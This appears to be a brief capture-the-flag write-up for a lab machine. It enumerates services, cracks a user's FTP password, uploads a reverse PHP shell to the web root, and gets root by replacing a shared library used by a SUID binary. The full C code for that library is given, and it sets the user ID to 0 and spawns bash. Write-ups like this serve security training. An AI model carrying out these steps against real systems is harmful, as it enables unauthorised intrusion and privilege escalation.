1. get reverse shell
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
browse port 80, get the user name eleanor
and alan
.
crack ftp service, get the user eleanor
's password.
use sftp login as eleanor
, get into the path /html
and upload reverse php shell, visit and get shell.
2. privilege escalation
find the program with suid, we get the file /home/alan/random
.
random
used Dynamic link library /lib/librooter.so
which we can replace.
Disassemble random
with ida.
int __cdecl main(int argc, const char **argv, const char **envp)
{
time_t v3; // rdi
int v5; // [rsp+1Ch] [rbp-4h]
v5 = atoi(argv[1]);
v3 = time(0LL);
srand(v3);
if ( v5 == rand() % 9 + 1 )
makemeroot(v3);
else
puts("Wrong number");
return 0;
Regardless of random numbers, you can enter the dynamic link function makemeroot
as long as you try a few more times. We recompile the librooter.so
with this code:
#include <stdlib.h>
void makemeroot()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
try a few more times, then get root.